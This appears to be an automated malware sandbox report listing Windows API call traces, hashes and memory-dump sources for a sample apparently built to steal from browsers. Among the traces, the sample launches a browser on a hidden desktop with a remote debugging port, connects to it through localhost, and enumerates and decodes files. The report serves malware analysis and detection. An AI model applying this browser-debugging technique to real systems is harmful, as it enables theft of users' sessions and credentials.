                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                                      • String ID:
                                                      • API String ID: 712834838-0
                                                      • Opcode ID: 3d77b5c61fa7b1930e55321776d513a302bb4781bd6cd9d06fb294281b17fff3
                                                      • Instruction ID: 625db320ff805c95ce5faed69c5e9098d81495e1956169f3f005cfb03a967ae5
                                                      • Opcode Fuzzy Hash: 3d77b5c61fa7b1930e55321776d513a302bb4781bd6cd9d06fb294281b17fff3
                                                      • Instruction Fuzzy Hash: 2F6295715016579BDB11BF74CC8CAAE7BBAEF84708F048528EC05A7250DB74DA05EFA2
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 004060FF
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00406152
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00406185
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 004061B5
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 004061F0
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00406223
                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406233
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$InternetOpen
                                                      • String ID: "$------
                                                      • API String ID: 2041821634-2370822465
                                                      • Opcode ID: 4f0ce9c0fb1772c530d97c52082a4be0ed6778ec1307027d3c312cc39a626e22
                                                      • Instruction ID: e1c77a48c9db9f9d7e3cee1d994f76c9f30b806028e6ece8452b3a013e69dddc
                                                      • Opcode Fuzzy Hash: 4f0ce9c0fb1772c530d97c52082a4be0ed6778ec1307027d3c312cc39a626e22
                                                      • Instruction Fuzzy Hash: 9C526D71A002169FCB21AB79DD89A9F77B5AF44304F15503AF806B72D1DB78EC058FA8
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C76366
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C763B9
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C763EC
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C7641C
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C76457
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C7648A
                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02C7649A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$InternetOpen
                                                      • String ID: "$------
                                                      • API String ID: 2041821634-2370822465
                                                      • Opcode ID: 4d8a2cabd9318834d20159f90b681af5907982a0b19ed4795d5b6e39518a98be
                                                      • Instruction ID: 6bde8148061b85409dd4e49978c7268aae28d846e4bf7bc5936b256a95f6766f
                                                      • Opcode Fuzzy Hash: 4d8a2cabd9318834d20159f90b681af5907982a0b19ed4795d5b6e39518a98be
                                                      • Instruction Fuzzy Hash: CA5271719016569FDB10EFB4DC88EAE7BBAEF84308F148428E805A7250DB74E945DFA1
                                                      APIs
                                                      • wsprintfA.USER32 ref: 02C83CF3
                                                      • FindFirstFileA.KERNEL32(?,?), ref: 02C83D0A
                                                      • StrCmpCA.SHLWAPI(?,004317A8), ref: 02C83D33
                                                      • StrCmpCA.SHLWAPI(?,004317AC), ref: 02C83D4D
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C83D86
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C83DAE
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C83DB9
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C83DC4
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C83DE1
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C83DED
                                                      • lstrlen.KERNEL32(?), ref: 02C83DFA
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C83E1A
                                                      • lstrcat.KERNEL32(00000000,?), ref: 02C83E28
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C83E51
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C83E95
                                                      • lstrlen.KERNEL32(?), ref: 02C83E9F
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C83ECC
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C83ED7
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C83EFD
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C83F0F
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C83F31
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C83F3D
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C83F65
                                                      • lstrlen.KERNEL32(?), ref: 02C83F79
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C83F99
                                                      • lstrcat.KERNEL32(00000000,?), ref: 02C83FA7
                                                      • lstrlen.KERNEL32(006389F0), ref: 02C83FD2
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C83FF8
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C84003
                                                      • lstrlen.KERNEL32(00638D00), ref: 02C84025
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8404B
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C84056
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8407E
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C84090
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C840AF
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C840BB
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C840E1
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8410E
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C84119
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84140
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C84152
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84174
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C84180
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C841A9
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C841D8
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C841E3
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8420A
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C8421C
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8423E
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C8424A
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84273
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C842A2
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C842AD
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C842D4
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C842E6
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84308
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C84314
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8433C
                                                      • lstrlen.KERNEL32(?), ref: 02C84350
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84370
                                                      • lstrcat.KERNEL32(00000000,?), ref: 02C8437E
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C843A7
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C843E6
                                                      • lstrlen.KERNEL32(00638CA4), ref: 02C843F5
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8441D
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C84428
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84451
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84495
                                                      • lstrcat.KERNEL32(00000000), ref: 02C844A2
                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 02C846A0
                                                      • FindClose.KERNEL32(00000000), ref: 02C846AF
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                                      • String ID:
                                                      • API String ID: 1006159827-0
                                                      • Opcode ID: e1e3807f12193d2689bfbdaf04f1d1e2928ce3de2f460a85145a4516f308cbb5
                                                      • Instruction ID: 4877e4432be9908e1300e0abc241d290327dc4025c97f07b93cb1ac70cf0e021
                                                      • Opcode Fuzzy Hash: e1e3807f12193d2689bfbdaf04f1d1e2928ce3de2f460a85145a4516f308cbb5
                                                      • Instruction Fuzzy Hash: EA6291719016579BDB25BF75CC88AAE7BBAEF8470CF048528F805A3250DB74DA04DFA1
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C74EE6
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C74F39
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C74F6C
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C74F9C
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C74FDA
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C7500D
                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02C7501D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$InternetOpen
                                                      • String ID: "$------
                                                      • API String ID: 2041821634-2370822465
                                                      • Opcode ID: 4ad1566aa4d1a6649d9a197ec9ce9ed6d1b2bf2dd256a75520a651cb196df419
                                                      • Instruction ID: 2ec8a39212e2791a015efb3df878bea002f07c0abe7eeb90809d0ec5c83e4ee2
                                                      • Opcode Fuzzy Hash: 4ad1566aa4d1a6649d9a197ec9ce9ed6d1b2bf2dd256a75520a651cb196df419
                                                      • Instruction Fuzzy Hash: 2D527E719016569FDB10EFB4CC88BAEBBB6EF84348F554028E805A7250DB74E946DFE0
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C86F44
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C86F74
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C86FA4
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C86FD6
                                                      • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 02C86FE3
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02C86FEA
                                                      • StrStrA.SHLWAPI(00000000,00434D94), ref: 02C87001
                                                      • lstrlen.KERNEL32(00000000), ref: 02C8700C
                                                      • malloc.MSVCRT ref: 02C87016
                                                      • strncpy.MSVCRT ref: 02C87024
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8704F
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C87076
                                                      • StrStrA.SHLWAPI(00000000,00434D9C), ref: 02C87089
                                                      • lstrlen.KERNEL32(00000000), ref: 02C87094
                                                      • malloc.MSVCRT ref: 02C8709E
                                                      • strncpy.MSVCRT ref: 02C870AC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C870D7
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C870FE
                                                      • StrStrA.SHLWAPI(00000000,00434DA4), ref: 02C87111
                                                      • lstrlen.KERNEL32(00000000), ref: 02C8711C
                                                      • malloc.MSVCRT ref: 02C87126
                                                      • strncpy.MSVCRT ref: 02C87134
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8715F
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C87186
                                                      • StrStrA.SHLWAPI(00000000,00434DAC), ref: 02C87199
                                                      • lstrlen.KERNEL32(00000000), ref: 02C871A8
                                                      • malloc.MSVCRT ref: 02C871B2
                                                      • strncpy.MSVCRT ref: 02C871C0
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C871F0
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C87218
                                                      • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02C8723B
                                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 02C8724F
                                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 02C87270
                                                      • LocalFree.KERNEL32(00000000), ref: 02C8727B
                                                      • lstrlen.KERNEL32(?), ref: 02C87315
                                                      • lstrlen.KERNEL32(?), ref: 02C87328
                                                      • lstrlen.KERNEL32(?), ref: 02C8733B
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrlen$mallocstrncpy$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                                      • String ID:
                                                      • API String ID: 2413810636-0
                                                      • Opcode ID: 8a715b1a4409878960c6aae2b2daf2f0f252ea71bb024136e07dc667a33e066e
                                                      • Instruction ID: bc458530274968b064d0974a62b62cb33fac9bd93a26b0394765fc9478c0a955
                                                      • Opcode Fuzzy Hash: 8a715b1a4409878960c6aae2b2daf2f0f252ea71bb024136e07dc667a33e066e
                                                      • Instruction Fuzzy Hash: 3E027274A00256AFDB10ABB4DC88B9EBBBAEF44708F249414F805E7250EB74D945DFA1
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C84F18
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84F3B
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C84F46
                                                      • lstrlen.KERNEL32(00434CB0), ref: 02C84F51
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84F6E
                                                      • lstrcat.KERNEL32(00000000,00434CB0), ref: 02C84F7A
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84FA5
                                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 02C84FC1
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                      • String ID:
                                                      • API String ID: 2567437900-0
                                                      • Opcode ID: 28406a95d0cc64f91aa304dbf2a2fc930f4309ba88c17d185a32f68a67b3ea55
                                                      • Instruction ID: fce032c97ee04487123381dc8280d71012e8d4b944730e9910cc9e46a7cd8ba4
                                                      • Opcode Fuzzy Hash: 28406a95d0cc64f91aa304dbf2a2fc930f4309ba88c17d185a32f68a67b3ea55
                                                      • Instruction Fuzzy Hash: 11923170A012058FDB24EF29C988B69B7F5AF8435CF5AC0ADD8099B3A1D7B1D941DF90
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C81648
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8166B
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C81676
                                                      • lstrlen.KERNEL32(00434CB0), ref: 02C81681
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8169E
                                                      • lstrcat.KERNEL32(00000000,00434CB0), ref: 02C816AA
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C816D5
                                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 02C816F1
                                                      • StrCmpCA.SHLWAPI(?,004317A8), ref: 02C81713
                                                      • StrCmpCA.SHLWAPI(?,004317AC), ref: 02C8172D
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C81766
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8178E
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C81799
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C817A4
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C817C1
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C817CD
                                                      • lstrlen.KERNEL32(?), ref: 02C817DA
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C817FA
                                                      • lstrcat.KERNEL32(00000000,?), ref: 02C81808
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81831
                                                      • StrCmpCA.SHLWAPI(?,00638C28), ref: 02C8185A
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8189B
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C818C4
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C818EC
                                                      • StrCmpCA.SHLWAPI(?,006388A8), ref: 02C81909
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8194A
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C81973
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8199B
                                                      • StrCmpCA.SHLWAPI(?,00638E3C), ref: 02C819B9
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C819EA
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C81A13
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C81A3C
                                                      • StrCmpCA.SHLWAPI(?,00638938), ref: 02C81A6A
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C81AAB
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C81AD4
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81AFC
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C81B4D
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81B75
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C81BAC
                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 02C81BD3
                                                      • FindClose.KERNEL32(00000000), ref: 02C81BE2
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 1346933759-0
                                                      • Opcode ID: 5de090228a520a034ca07d734478d829abf3d0d61972fb49c586d92848864290
                                                      • Instruction ID: 2dc1108cc7d0408340a0ecd9bb7a803d14096f8836841c82e30bcaafe01a11fc
                                                      • Opcode Fuzzy Hash: 5de090228a520a034ca07d734478d829abf3d0d61972fb49c586d92848864290
                                                      • Instruction Fuzzy Hash: 24128570A006069FDB14FF79DC89AAE7BF6EF44308F088528E849A7250DB74D945DFA1
                                                      APIs
                                                      • GetProcAddress.KERNEL32(006390E0,00638DC8), ref: 02C96860
                                                      • GetProcAddress.KERNEL32(006390E0,00638E44), ref: 02C96879
                                                      • GetProcAddress.KERNEL32(006390E0,00638A64), ref: 02C96891
                                                      • GetProcAddress.KERNEL32(006390E0,00638A50), ref: 02C968A9
                                                      • GetProcAddress.KERNEL32(006390E0,00638AF8), ref: 02C968C2
                                                      • GetProcAddress.KERNEL32(006390E0,00638CD4), ref: 02C968DA
                                                      • GetProcAddress.KERNEL32(006390E0,00638B3C), ref: 02C968F2
                                                      • GetProcAddress.KERNEL32(006390E0,00638DA0), ref: 02C9690B
                                                      • GetProcAddress.KERNEL32(006390E0,00638D48), ref: 02C96923
                                                      • GetProcAddress.KERNEL32(006390E0,00638BBC), ref: 02C9693B
                                                      • GetProcAddress.KERNEL32(006390E0,00638AE8), ref: 02C96954
                                                      • GetProcAddress.KERNEL32(006390E0,00638E0C), ref: 02C9696C
                                                      • GetProcAddress.KERNEL32(006390E0,006388B0), ref: 02C96984
                                                      • GetProcAddress.KERNEL32(006390E0,00638D98), ref: 02C9699D
                                                      • GetProcAddress.KERNEL32(006390E0,00638A24), ref: 02C969B5
                                                      • GetProcAddress.KERNEL32(006390E0,00638C18), ref: 02C969CD
                                                      • GetProcAddress.KERNEL32(006390E0,00638E34), ref: 02C969E6
                                                      • GetProcAddress.KERNEL32(006390E0,006388BC), ref: 02C969FE
                                                      • GetProcAddress.KERNEL32(006390E0,0063892C), ref: 02C96A16
                                                      • GetProcAddress.KERNEL32(006390E0,00638AB0), ref: 02C96A2F
                                                      • LoadLibraryA.KERNEL32(00638D50,?,?,?,02C9203A), ref: 02C96A40
                                                      • LoadLibraryA.KERNEL32(0063897C,?,?,?,02C9203A), ref: 02C96A52
                                                      • LoadLibraryA.KERNEL32(00638904,?,?,?,02C9203A), ref: 02C96A64
                                                      • LoadLibraryA.KERNEL32(006389DC,?,?,?,02C9203A), ref: 02C96A75
                                                      • LoadLibraryA.KERNEL32(00638B28,?,?,?,02C9203A), ref: 02C96A87
                                                      • GetProcAddress.KERNEL32(00638EF8,00638CAC), ref: 02C96AA4
                                                      • GetProcAddress.KERNEL32(00639020,00638C24), ref: 02C96AC0
                                                      • GetProcAddress.KERNEL32(00639020,006389CC), ref: 02C96AD8
                                                      • GetProcAddress.KERNEL32(00639114,00638B94), ref: 02C96AF4
                                                      • GetProcAddress.KERNEL32(00638FD4,00638928), ref: 02C96B10
                                                      • GetProcAddress.KERNEL32(00639004,00638C14), ref: 02C96B2C
                                                      • GetProcAddress.KERNEL32(00639004,004352A4), ref: 02C96B43
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID:
                                                      • API String ID: 2238633743-0
                                                      • Opcode ID: 679f949250fc69e3c6c948a61fb191331c2934ca864fe0a6fb2186dc54d65b5c
                                                      • Instruction ID: 276a49cd547531bf9e3ba30e1e0d65b327c20e412c19dcea1da1c6d72e3c9406
                                                      • Opcode Fuzzy Hash: 679f949250fc69e3c6c948a61fb191331c2934ca864fe0a6fb2186dc54d65b5c
                                                      • Instruction Fuzzy Hash: 00A16DB9A117009FD758DF69EE88A6637BBF789344300A51DF94683360DBB4A900DFB0
                                                      APIs
                                                      • memset.MSVCRT ref: 00409790
                                                      • lstrcatA.KERNEL32(?,?), ref: 004097A0
                                                      • lstrcatA.KERNEL32(?,?), ref: 004097B1
                                                      • lstrcatA.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 004097C3
                                                      • memset.MSVCRT ref: 004097D7
                                                        • Part of subcall function 00424040: lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00424075
                                                        • Part of subcall function 00424040: lstrcpy.KERNEL32(00000000,02D68720), ref: 0042409F
                                                        • Part of subcall function 00424040: GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00404DFA,?,00000014), ref: 004240A9
                                                      • wsprintfA.USER32 ref: 00409806
                                                      • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409827
                                                      • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409844
                                                        • Part of subcall function 004248B0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004248C9
                                                        • Part of subcall function 004248B0: Process32First.KERNEL32(00000000,00000128), ref: 004248D9
                                                        • Part of subcall function 004248B0: Process32Next.KERNEL32(00000000,00000128), ref: 004248EB
                                                        • Part of subcall function 004248B0: StrCmpCA.SHLWAPI(?,?), ref: 004248FD
                                                        • Part of subcall function 004248B0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00424912
                                                        • Part of subcall function 004248B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00424921
                                                        • Part of subcall function 004248B0: CloseHandle.KERNEL32(00000000), ref: 00424928
                                                        • Part of subcall function 004248B0: Process32Next.KERNEL32(00000000,00000128), ref: 00424936
                                                        • Part of subcall function 004248B0: CloseHandle.KERNEL32(00000000), ref: 00424941
                                                      • memset.MSVCRT ref: 00409862
                                                      • lstrcatA.KERNEL32(00000000,?), ref: 00409878
                                                      • lstrcatA.KERNEL32(00000000,?), ref: 00409889
                                                      • lstrcatA.KERNEL32(00000000,00434B68), ref: 0040989B
                                                      • memset.MSVCRT ref: 004098AF
                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004098D4
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00409903
                                                      • StrStrA.SHLWAPI(00000000,02D8E010), ref: 00409919
                                                      • lstrcpyn.KERNEL32(006393D0,00000000,00000000), ref: 00409938
                                                      • lstrlenA.KERNEL32(?), ref: 0040994B
                                                      • wsprintfA.USER32 ref: 0040995B
                                                      • lstrcpy.KERNEL32(?,00000000), ref: 00409971
                                                      • memset.MSVCRT ref: 00409986
                                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 004099D8
                                                      • Sleep.KERNEL32(00001388), ref: 004099E7
                                                        • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401557
                                                        • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401579
                                                        • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 0040159B
                                                        • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 004015FF
                                                        • Part of subcall function 004092B0: strlen.MSVCRT ref: 004092E1
                                                        • Part of subcall function 004092B0: strlen.MSVCRT ref: 004092FA
                                                        • Part of subcall function 004092B0: memset.MSVCRT ref: 00409341
                                                        • Part of subcall function 004092B0: lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 0040935C
                                                        • Part of subcall function 004092B0: lstrcatA.KERNEL32(?,00000000), ref: 00409372
                                                        • Part of subcall function 004092B0: strlen.MSVCRT ref: 00409399
                                                        • Part of subcall function 004092B0: strlen.MSVCRT ref: 004093E6
                                                        • Part of subcall function 00424950: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00424969
                                                        • Part of subcall function 00424950: Process32First.KERNEL32(00000000,00000128), ref: 00424979
                                                        • Part of subcall function 00424950: Process32Next.KERNEL32(00000000,00000128), ref: 0042498B
                                                        • Part of subcall function 00424950: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004249AC
                                                        • Part of subcall function 00424950: TerminateProcess.KERNEL32(00000000,00000000), ref: 004249BB
                                                        • Part of subcall function 00424950: CloseHandle.KERNEL32(00000000), ref: 004249C2
                                                        • Part of subcall function 00424950: Process32Next.KERNEL32(00000000,00000128), ref: 004249D0
                                                        • Part of subcall function 00424950: CloseHandle.KERNEL32(00000000), ref: 004249DB
                                                      • CloseDesktop.USER32(?), ref: 00409A1C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
